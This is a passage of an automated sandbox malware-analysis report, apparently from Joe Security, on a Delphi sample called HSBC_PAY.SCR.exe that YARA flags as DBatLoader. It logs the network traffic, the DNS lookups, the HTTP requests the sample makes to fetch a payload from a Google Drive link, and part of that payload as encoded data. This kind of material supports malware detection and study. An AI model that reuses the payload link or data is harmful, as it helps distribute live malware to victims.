Jan 3, 2025 20:02:01.182235003 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.182271004 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.182276011 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.182337999 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.182363987 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.182369947 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.182374954 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.182410955 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.182434082 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.183178902 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.183216095 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.183219910 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.183299065 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.183330059 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.183335066 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.183437109 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.183470964 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.183475018 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.186934948 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.186980009 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.186985970 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.187056065 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.187077999 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.187088966 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.187093973 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.187129974 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.187135935 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.197098970 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.197160006 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.197165012 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.197170019 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.197206974 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.197211981 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.247556925 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.247597933 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.247616053 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.247626066 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.247653961 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.247663975 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.247668028 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.247706890 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.247708082 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.247715950 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.247761965 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.247767925 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.247796059 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.247832060 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.247837067 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.247989893 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.248040915 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.248301029 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.248322964 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
Jan 3, 2025 20:02:01.248333931 CET | 49732 | 443 | 192.168.2.4 | 142.250.185.129
Jan 3, 2025 20:02:01.248339891 CET | 443 | 49732 | 142.250.185.129 | 192.168.2.4
UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 3, 2025 20:01:55.964399099 CET | 60603 | 53 | 192.168.2.4 | 1.1.1.1
Jan 3, 2025 20:01:55.971420050 CET | 53 | 60603 | 1.1.1.1 | 192.168.2.4
Jan 3, 2025 20:01:57.032021999 CET | 54028 | 53 | 192.168.2.4 | 1.1.1.1
Jan 3, 2025 20:01:57.038842916 CET | 53 | 54028 | 1.1.1.1 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 3, 2025 20:01:55.964399099 CET | 192.168.2.4 | 1.1.1.1 | 0x2278 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 3, 2025 20:01:57.032021999 CET | 192.168.2.4 | 1.1.1.1 | 0xcc65 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 3, 2025 20:01:55.971420050 CET | 1.1.1.1 | 192.168.2.4 | 0x2278 | No error (0) | drive.google.com | | 142.250.184.238 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 20:01:57.038842916 CET | 1.1.1.1 | 192.168.2.4 | 0xcc65 | No error (0) | drive.usercontent.google.com | | 142.250.185.129 | A (IP address) | IN (0x0001) | false

HTTP Request Dependency Graph

• drive.google.com
• drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 142.250.184.238 | 443 | 6808 | C:\Users\user\Desktop\HSBC_PAY.SCR.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-03 19:01:56 UTC | 205 | OUT | GET /uc?export=download&id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: drive.google.com
2025-01-03 19:01:57 UTC | 1319 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 03 Jan 2025 19:01:56 GMT
Location: https://drive.usercontent.google.com/download?id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8&export=download
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'report-sample' 'nonce-Iktmtqq6jyBGhG6ZXYlh0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 142.250.185.129 | 443 | 6808 | C:\Users\user\Desktop\HSBC_PAY.SCR.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-03 19:01:57 UTC | 223 | OUT | GET /download?id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8&export=download HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: drive.usercontent.google.com
2025-01-03 19:02:00 UTC | 4939 | IN | HTTP/1.1 200 OK
X-GUploader-UploadID: AFiumC4WwvBYc9wyPWTj-CwgAx6VAY9OnEjXJOwfG1lhO9I1spqGq8Xb0UQEpTTDRhnWqDkkCuskiuY
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="233_Ktnfnozurgp"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 820568
Last-Modified: Wed, 01 Jan 2025 08:19:34 GMT
Date: Fri, 03 Jan 2025 19:02:00 GMT
Expires: Fri, 03 Jan 2025 19:02:00 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=QiEjaw==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2025-01-03 19:02:00 UTC | 4939 | IN | Data Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 67 46 78 30 67 46 42 45 53 48 68 49 5a 48 41 34 53 4a 41 38 61 44 69 63 57 46 42 38 57 44 78 51 51 49 68 34 4f 45 52 63 58 4a 52 38 52 47 42 34 53 48 52 63 58 45 77 34 68 47 68 45 58 44 68 6b 4f 4a 52 59 64 48 69 49 52 46 78 49 6a 48 52 51 63 48 52 49 6b 44 68 63 52 48 36 61 75 70 56 6b 6a 70 37 46 4c 56 69 45 62 45 78 73 63 4a 79 49 66 46 42 32 6d 72 71 56 5a 49 36 65 78 53 38 66 4f 78 4d 66 62 32 4e 6e 46 32 64 44 54 31 64 6e 4c 31 74 48 56 76 73 33 62 78 73 33 57 32 39 66 4a 78 64 58 59 7a 73 36 38 78 74 6a 50 78 64 6e 45 7a 73 37 61 31 63 6a 52 32 4d 37 56 30 4e 57 38 7a 63 54 46 79 64 6a 4f 32 63 72 45 32 39 50 45 32 63 76 56 7a 74 6a 47 78 38 37 45 78 39 76 59 32 63 58 5a 30 4e 50 56 32 63 76 57 30 64 57 2b 7a 64 76
Data Ascii: pq6lWSOnsUsgFx0gFBESHhIZHA4SJA8aDicWFB8WDxQQIh4OERcXJR8RGB4SHRcXEw4hGhEXDhkOJRYdHiIRFxIjHRQcHRIkDhcRH6aupVkjp7FLViEbExscJyIfFB2mrqVZI6exS8fOxMfb2NnF2dDT1dnL1tHVvs3bxs3W29fJxdXYzs68xtjPxdnEzs7a1cjR2M7V0NW8zcTFydjO2crE29PE2cvVztjGx87Ex9vY2cXZ0NPV2cvW0dW+zdv
2025-01-03 19:02:00 UTC | 4821 | IN | Data Raw: 78 57 35 39 7a 38 61 49 6b 4e 43 71 59 6f 65 73 48 52 63 42 42 42 73 64 54 43 64 33 54 31 7a 73 6f 37 7a 63 57 4a 62 58 54 48 78 57 77 75 45 78 30 79 4a 55 70 54 61 41 61 61 31 63 58 6e 41 70 4a 69 66 55 4d 46 6d 6a 75 70 62 64 37 38 58 7a 64 6b 6a 65 73 46 57 38 77 46 2f 64 4b 2b 41 50 54 43 43 32 56 68 32 54 63 66 71 33 45 42 71 49 67 47 39 77 65 33 6a 41 34 4d 76 72 72 52 65 7a 4c 43 50 59 4e 33 79 35 4e 5a 7a 2b 6f 52 66 74 6b 4f 30 4d 35 69 6b 79 6a 44 45 76 74 36 6d 48 34 43 66 34 45 79 59 77 56 4b 78 69 35 6b 4e 75 49 73 7a 4e 71 68 74 36 35 6d 34 37 72 32 72 34 4c 62 47 62 30 71 6e 6d 42 59 57 6c 76 4f 7a 6b 58 38 69 6a 72 7a 6c 44 31 46 74 6a 65 69 5a 79 79 50 77 67 30 69 50 6c 43 6f 4e 7a 35 6f 64 42 48 6b 67 5a 48 47 4a 30 43 39 4c 56 46 4c 52
Data Ascii: xW59z8aIkNCqYoesHRcBBBsdTCd3T1zso7zcWJbXTHxWwuEx0yJUpTaAaa1cXnApJifUMFmjupbd78XzdkjesFW8wF/dK+APTCC2Vh2Tcfq3EBqIgG9we3jA4MvrrRezLCPYN3y5NZz+oRftkO0M5ikyjDEvt6mH4Cf4EyYwVKxi5kNuIszNqht65m47r2r4LbGb0qnmBYWlvOzkX8ijrzlD1FtjeiZyyPwg0iPlCoNz5odBHkgZHGJ0C9LVFLR
2025-01-03 19:02:00 UTC | 1321 | IN | Data Raw: 38 52 6e 2f 41 61 57 68 56 69 6b 53 52 4e 74 76 68 43 6d 62 45 36 30 6e 57 38 75 45 2b 50 51 63 49 6a 41 6e 47 41 34 6f 56 4a 75 36 31 2f 72 6e 6c 6d 69 47 79 50 42 63 62 46 6f 32 77 55 36 75 73 48 50 62 46 6e 77 57 33 5a 58 6c 37 44 4d 68 7a 54 38 76 37 56 48 36 68 4b 49 47 52 79 74 6c 57 67 65 4b 34 52 57 45 33 4f 30 34 2f 36 74 54 2b 44 30 2b 49 39 50 41 46 78 61 52 6f 6d 51 4c 6f 4f 59 69 6f 44 4b 35 50 71 41 33 32 48 51 44 30 7a 53 63 51 36 61 41 35 47 37 47 43 43 7a 49 35 73 35 49 78 30 33 4d 76 56 66 51 4a 66 46 4e 5a 48 38 61 54 61 58 72 43 6d 36 63 34 2f 63 56 66 54 44 66 50 63 35 69 67 7a 6d 44 45 55 54 37 55 44 45 44 71 34 63 6e 5a 6b 53 6c 30 71 77 49 74 30 34 44 59 39 6c 72 46 6d 79 50 59 4c 4c 34 39 56 78 4a 46 43 68 74 6c 67 31 71 4f 54 50
Data Ascii: 8Rn/AaWhVikSRNtvhCmbE60nW8uE+PQcIjAnGA4oVJu61/rnlmiGyPBcbFo2wU6usHPbFnwW3ZXl7DMhzT8v7VH6hKIGRytlWgeK4RWE3O04/6tT+D0+I9PAFxaRomQLoOYioDK5PqA32HQD0zScQ6aA5G7GCCzI5s5Ix03MvVfQJfFNZH8aTaXrCm6c4/cVfTDfPc5igzmDEUT7UDEDq4cnZkSl0qwIt04DY9lrFmyPYLL49VxJFChtlg1qOTP
2025-01-03 19:02:00 UTC | 1390 | IN | Data Raw: 6a 6e 34 76 6c 6d 5a 4d 76 4f 50 2f 58 6b 77 59 43 63 4d 6f 46 53 57 48 73 56 42 74 36 4a 37 4a 71 43 71 30 58 58 37 4d 53 54 58 42 32 49 57 30 52 32 67 65 42 2b 69 2b 73 45 6d 4a 41 67 35 35 32 44 62 71 41 36 52 75 75 6f 66 79 62 70 70 72 6e 41 59 2f 7a 33 51 33 52 62 76 31 58 59 71 4d 69 32 54 30 32 62 45 4f 6d 52 61 4e 6a 73 68 4c 41 6b 73 7a 70 41 51 4e 76 48 54 48 6d 68 55 32 37 57 6b 62 6f 50 51 54 6d 37 2b 65 79 6a 47 55 44 70 6a 33 4e 7a 69 38 61 4a 36 4e 37 37 31 2f 45 64 78 33 61 65 61 68 49 2b 4a 70 74 41 4b 4c 64 4d 38 58 6c 58 34 4d 36 62 73 65 65 57 46 41 45 43 6f 4a 71 33 54 4a 47 43 59 78 41 50 74 65 73 41 35 76 42 6c 4c 6a 45 6c 70 57 45 4b 73 78 58 4d 54 44 6d 6a 6f 6e 4b 6b 37 51 32 69 78 69 34 79 56 6c 39 66 30 6f 6d 64 5a 6e 75 50 66
Data Ascii: jn4vlmZMvOP/XkwYCcMoFSWHsVBt6J7JqCq0XX7MSTXB2IW0R2geB+i+sEmJAg552DbqA6RuuofybpprnAY/z3Q3Rbv1XYqMi2T02bEOmRaNjshLAkszpAQNvHTHmhU27WkboPQTm7+eyjGUDpj3Nzi8aJ6N771/Edx3aeahI+JptAKLdM8XlX4M6bseeWFAECoJq3TJGCYxAPtesA5vBlLjElpWEKsxXMTDmjonKk7Q2ixi4yVl9f0omdZnuPf
2025-01-03 19:02:00 UTC | 1390 | IN | Data Raw: 4c 44 52 6d 30 7a 79 67 2f 39 71 7a 65 32 31 32 58 48 41 38 78 4d 47 46 41 5a 6a 77 6a 58 46 67 2f 6f 79 62 34 42 34 4e 7a 4b 5a 46 48 33 53 59 78 67 61 6c 6e 44 4e 48 56 72 59 53 53 62 77 4e 70 6e 69 78 54 68 74 35 38 68 36 2b 44 4e 78 66 4a 63 78 4e 78 2f 6d 42 59 7a 34 5a 56 76 71 32 34 75 45 2b 59 4d 41 6b 35 72 5a 53 71 50 35 74 59 50 4f 74 71 2b 39 41 34 66 35 57 42 52 69 6a 75 2b 6e 4b 61 44 6b 72 6a 6c 48 75 6f 4b 4e 31 37 32 54 39 39 63 6f 41 6f 69 33 6b 78 73 31 6f 31 42 76 65 32 6f 4d 56 30 7a 43 4b 44 38 64 63 61 65 76 53 79 32 43 6b 37 32 39 4e 45 49 48 62 5a 62 77 42 68 2b 34 62 53 4c 62 41 52 6d 4e 75 45 57 38 4d 78 63 50 59 48 63 54 4b 67 5a 4c 34 35 74 47 47 67 6f 33 78 44 7a 57 64 34 74 4e 4f 51 57 65 30 6d 42 31 4f 38 6b 46 39 2b 41 72
Data Ascii: LDRm0zyg/9qze212XHA8xMGFAZjwjXFg/oyb4B4NzKZFH3SYxgalnDNHVrYSSbwNpnixTht58h6+DNxfJcxNx/mBYz4ZVvq24uE+YMAk5rZSqP5tYPOtq+9A4f5WBRiju+nKaDkrjlHuoKN172T99coAoi3kxs1o1Bve2oMV0zCKD8dcaevSy2Ck729NEIHbZbwBh+4bSLbARmNuEW8MxcPYHcTKgZL45tGGgo3xDzWd4tNOQWe0mB1O8kF9+Ar
2025-01-03 19:02:00 UTC | 1390 | IN | Data Raw: 48 36 42 44 2b 37 31 52 41 6e 32 68 33 72 47 6a 47 74 4c 4d 6c 44 4c 76 2b 42 50 39 34 58 31 61 31 71 33 77 70 68 53 32 57 45 43 56 48 6e 59 39 30 44 59 4f 56 32 43 72 55 64 39 50 71 51 47 37 73 58 36 2f 4d 4a 33 50 49 44 72 42 58 77 61 48 63 63 55 77 75 75 66 42 68 4f 4e 62 33 42 2f 4f 38 6a 73 6e 7a 76 56 4e 54 56 43 33 42 66 68 71 4f 31 4b 4c 63 44 38 4b 79 6b 35 5a 6d 4d 50 63 6b 4d 45 59 35 30 67 78 44 78 64 70 2f 34 47 79 47 41 32 65 4d 6a 38 32 47 49 35 4e 2f 68 68 35 4a 76 73 2f 6f 73 31 42 4a 4f 35 56 4f 69 5a 52 58 76 51 56 74 79 74 4d 32 5a 61 73 6b 46 73 56 4f 52 32 7a 39 50 4c 67 33 66 33 35 59 76 2f 79 50 4e 50 2f 4d 57 71 77 49 54 56 45 39 69 6a 54 5a 36 39 62 7a 35 68 37 53 74 53 66 39 68 52 6e 37 62 44 4d 4e 53 6b 67 51 58 46 49 42 2b 4e
Data Ascii: H6BD+71RAn2h3rGjGtLMlDLv+BP94X1a1q3wphS2WECVHnY90DYOV2CrUd9PqQG7sX6/MJ3PIDrBXwaHccUwuufBhONb3B/O8jsnzvVNTVC3BfhqO1KLcD8Kyk5ZmMPckMEY50gxDxdp/4GyGA2eMj82GI5N/hh5Jvs/os1BJO5VOiZRXvQVtytM2ZaskFsVOR2z9PLg3f35Yv/yPNP/MWqwITVE9ijTZ69bz5h7StSf9hRn7bDMNSkgQXFIB+N
2025-01-03 19:02:00 UTC | 1390 | IN | Data Raw: 35 66 34 6a 56 4b 56 6a 5a 53 77 38 63 49 74 2b 6f 66 69 5a 7a 2f 70 77 7a 4f 4c 46 54 4a 66 4a 45 67 58 48 48 39 63 75 31 52 4b 46 6d 35 4b 4d 7a 44 75 79 46 6a 51 38 55 6e 72 6d 47 4f 33 61 4d 79 7a 61 74 37 41 66 39 4c 67 37 74 72 4b 30 35 6b 4a 64 6c 44 39 55 79 68 34 48 64 46 46 62 52 61 72 38 54 6d 55 6e 34 49 72 41 5a 46 35 31 6e 73 59 63 38 56 67 39 68 39 78 69 2f 4f 4d 32 51 4c 71 55 68 41 76 5a 79 45 47 34 4c 32 36 72 38 50 6b 59 34 71 70 2b 77 58 57 31 4f 75 45 7a 75 76 6c 73 2b 66 66 78 36 55 59 76 70 6e 68 35 45 71 33 35 71 52 78 7a 36 50 54 6f 41 41 42 52 35 68 56 75 5a 4e 47 35 68 47 55 63 6b 75 53 58 53 52 32 2b 30 69 4d 6d 68 7a 6b 7a 6c 62 57 6b 62 57 39 30 73 37 78 56 66 51 30 6f 57 30 71 73 65 74 69 59 58 53 63 63 2f 33 72 7a 38 51 31
Data Ascii: 5f4jVKVjZSw8cIt+ofiZz/pwzOLFTJfJEgXHH9cu1RKFm5KMzDuyFjQ8UnrmGO3aMyzat7Af9Lg7trK05kJdlD9Uyh4HdFFbRar8TmUn4IrAZF51nsYc8Vg9h9xi/OM2QLqUhAvZyEG4L26r8PkY4qp+wXW1OuEzuvls+ffx6UYvpnh5Eq35qRxz6PToAABR5hVuZNG5hGUckuSXSR2+0iMmhzkzlbWkbW90s7xVfQ0oW0qsetiYXScc/3rz8Q1
2025-01-03 19:02:00 UTC | 1390 | IN | Data Raw: 70 47 44 70 50 34 43 39 4d 49 70 47 77 65 62 79 31 45 44 7a 6e 68 35 5a 2f 70 43 30 33 68 70 48 46 6c 34 74 65 48 57 77 51 31 69 6f 75 61 78 71 56 78 30 58 43 58 59 69 42 61 42 2f 4c 71 50 62 38 63 54 38 30 78 44 38 73 57 67 37 63 66 71 7a 4f 62 70 39 37 38 58 34 53 52 74 6f 70 72 67 41 33 44 67 64 53 4b 42 75 38 48 71 72 66 43 76 56 74 31 56 62 64 31 72 34 2f 78 47 72 35 6e 6e 77 5a 63 56 6b 70 6a 47 38 67 36 61 2f 56 4f 5a 57 32 66 6c 32 54 6e 4b 66 58 48 79 75 73 42 79 61 52 4b 38 72 34 37 56 54 58 68 52 38 37 48 78 4d 79 5a 55 5a 70 63 6a 78 4c 49 51 34 33 76 4d 6f 78 47 58 44 2f 68 54 30 4e 56 31 54 33 63 55 66 49 65 31 4e 6e 6d 4f 35 79 67 41 37 65 77 77 78 55 32 61 34 4c 67 52 70 4e 37 6a 30 45 78 56 4f 32 65 71 6c 52 35 2b 7a 58 32 58 4a 70 62 61
Data Ascii: pGDpP4C9MIpGweby1EDznh5Z/pC03hpHFl4teHWwQ1iouaxqVx0XCXYiBaB/LqPb8cT80xD8sWg7cfqzObp978X4SRtoprgA3DgdSKBu8HqrfCvVt1Vbd1r4/xGr5nnwZcVkpjG8g6a/VOZW2fl2TnKfXHyusByaRK8r47VTXhR87HxMyZUZpcjxLIQ43vMoxGXD/hT0NV1T3cUfIe1NnmO5ygA7ewwxU2a4LgRpN7j0ExVO2eqlR5+zX2XJpba
2025-01-03 19:02:00 UTC | 1390 | IN | Data Raw: 65 64 6a 4f 42 6f 69 6a 61 52 51 58 6b 42 75 57 46 6b 54 4f 4b 6a 4c 31 43 48 49 48 6c 6a 53 2b 45 69 53 38 2b 4f 42 46 66 36 77 45 4f 50 62 67 48 66 63 4d 47 31 4a 34 52 55 72 35 76 71 33 76 6f 34 78 62 4d 4e 59 2f 4b 6b 58 52 64 37 4c 43 69 46 58 35 70 6d 47 55 68 63 32 78 66 59 30 38 56 67 73 61 50 6f 35 2f 63 41 6d 32 52 59 32 66 62 2b 61 59 43 6e 53 56 52 4f 48 59 68 5a 67 57 73 62 43 4c 43 6a 67 54 38 64 35 6d 4b 5a 76 2f 33 4a 31 6c 5a 7a 58 4e 55 76 76 75 44 48 58 71 62 4a 66 36 48 35 76 43 37 52 4f 71 70 64 52 2f 37 79 4f 57 4d 75 74 2b 47 44 73 4b 65 4a 2b 37 47 2f 53 44 33 56 6b 52 36 55 71 7a 4f 6c 68 65 75 4c 6b 31 49 36 46 39 59 46 69 46 37 6d 4f 35 48 49 53 69 4e 44 39 31 47 77 6f 79 66 45 4a 33 75 6b 52 6d 6a 45 32 76 66 34 4d 4f 68 55 59
                                                                  Data Ascii: edjOBoijaRQXkBuWFkTOKjL1CHIHljS+EiS8+OBFf6wEOPbgHfcMG1J4RUr5vq3vo4xbMNY/KkXRd7LCiFX5pmGUhc2xfY08VgsaPo5/cAm2RY2fb+aYCnSVROHYhZgWsbCLCjgT8d5mKZv/3J1lZzXNUvvuDHXqbJf6H5vC7ROqpdR/7yOWMut+GDsKeJ+7G/SD3VkR6UqzOlheuLk1I6F9YFiF7mO5HISiND91GwoyfEJ3ukRmjE2vf4MOhUY
                                                                  2025-01-03 19:02:00 UTC1390INData Raw: 43 57 57 57 59 30 4a 61 45 59 62 6d 79 67 6b 34 44 5a 65 49 37 4f 32 6e 30 56 76 4a 43 68 2f 64 48 6e 74 2b 57 41 63 52 32 70 39 42 53 53 69 42 76 6b 45 37 34 6c 6a 45 31 4b 41 35 4a 2f 4e 62 73 34 65 48 55 6b 5a 47 4c 50 65 61 49 45 32 7a 4c 6b 36 6c 4c 2b 53 54 61 37 44 38 78 42 6d 43 6a 51 31 41 78 56 58 54 4e 43 6b 4e 5a 4a 2b 45 2f 79 44 39 62 68 64 73 37 74 63 4d 70 52 68 62 59 2b 33 51 79 36 43 65 50 34 4e 59 6d 2f 43 2f 73 4f 63 6e 6a 5a 46 6c 6d 64 64 4d 57 31 50 53 37 4d 30 33 5a 63 4b 71 71 4a 68 4c 6e 2f 44 52 67 54 75 63 62 30 6f 38 6f 35 79 58 6b 2b 56 38 57 59 6b 6d 6e 72 2f 2f 65 32 5a 72 78 71 38 4b 66 33 50 36 72 37 63 65 69 71 62 74 49 69 6d 77 48 63 52 53 6f 41 74 49 76 55 41 58 46 75 30 2f 6e 78 65 47 47 55 4c 32 41 6a 79 58 65 68 49
                                                                  Data Ascii: CWWWY0JaEYbmygk4DZeI7O2n0VvJCh/dHnt+WAcR2p9BSSiBvkE74ljE1KA5J/Nbs4eHUkZGLPeaIE2zLk6lL+STa7D8xBmCjQ1AxVXTNCkNZJ+E/yD9bhds7tcMpRhbY+3Qy6CeP4NYm/C/sOcnjZFlmddMW1PS7M03ZcKqqJhLn/DRgTucb0o8o5yXk+V8WYkmnr//e2Zrxq8Kf3P6r7ceiqbtIimwHcRSoAtIvUAXFu0/nxeGGUL2AjyXehI



                                                                  Target ID:0
                                                                  Start time:14:01:54
                                                                  Start date:03/01/2025
                                                                  Path:C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\HSBC_PAY.SCR.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'010'688 bytes
                                                                  MD5 hash:23B640CC7B2CFF45CEEF1C718E7095E0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1704893572.000000000224B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1642008766.000000007FD90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:14:02:00
